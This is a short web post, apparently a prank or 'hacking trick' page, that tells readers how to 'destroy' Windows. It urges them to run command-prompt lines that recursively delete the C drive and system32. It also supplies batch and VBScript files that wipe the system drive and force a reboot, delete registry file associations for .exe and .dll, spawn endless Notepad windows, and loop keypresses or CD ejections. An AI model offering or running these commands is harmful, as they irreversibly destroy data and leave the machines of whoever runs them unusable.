Best way to Destroy M$ Windows
Run this command without moderation;)
1Type this in command prompt:
RD C:\ /S /Q
del c:\windows\system32*.* /q
del /f /s /q “C:*.*.”
2Type this in notepad:
Save the file anywhere (.bat) and execute it:
2.1 The blue screen of Death
Code:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
2.2 Stupidity Shutdown
code:
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c “Error! You are too stupid!” -s -t 10
2.3 Delete Key Registry Files
code:
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  Have a nice day.
GOTO MESSAGE
2.4 Endless Notepads
code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
2.5 Crazy caps lock
code:
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
2.6 Endless Enter
code:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
2.7 Endless Backspace
code:
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
2.8 Popping CD Drives
code:
Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop
And have a good day!
Font’s: dbsdp and itechnobuzz